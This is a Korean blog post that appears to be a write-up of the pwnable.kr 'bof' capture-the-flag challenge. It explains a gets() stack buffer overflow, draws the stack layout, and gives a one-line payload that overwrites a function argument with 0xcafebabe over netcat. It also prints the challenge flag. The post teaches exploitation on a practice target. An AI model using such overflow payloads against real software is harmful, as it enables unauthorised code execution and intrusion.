본문 바로가기
CTF_/pwnable.kr

[pwnable.kr] bof

by 낭람_ 2022. 1. 9.
반응형

 

wget를 이용하여 다운로드를 받아준다.

wget http://pwnable.kr/bin/bof
wget http://pwnable.kr/bin/bof.c

 

 

gets부분에서 오버플로우가 일어날 수 있고, func 함수의 인자값인 0xdeadbeef를 0xcafebabe로 바꿔야 한다.

 

 

gdb로 func 함수를 확인해보면, overflowme의 시작지점이 ebp-0x2c라는것을 알 수 있다.

 

스택을 그리면

overflowme[32] 

dummy[12]

sfp[4]

ret[4]

0xdeadbeef[4]

 

이렇게 된다.

 

(python -c 'print "A"*52+"\xbe\xba\xfe\xca"';cat) | nc pwnable.kr 9000

 

52바이트의 dummy값을 넣어주고, cafebabe를 리틀엔디언으로 넣어준다.

 

 

flag : daddy, I just pwned a buFFer :)

반응형

'CTF_ > pwnable.kr' 카테고리의 다른 글

[pwnable.kr] col  (0) 2022.01.09
[pwnable.kr] fd  (0) 2022.01.09

댓글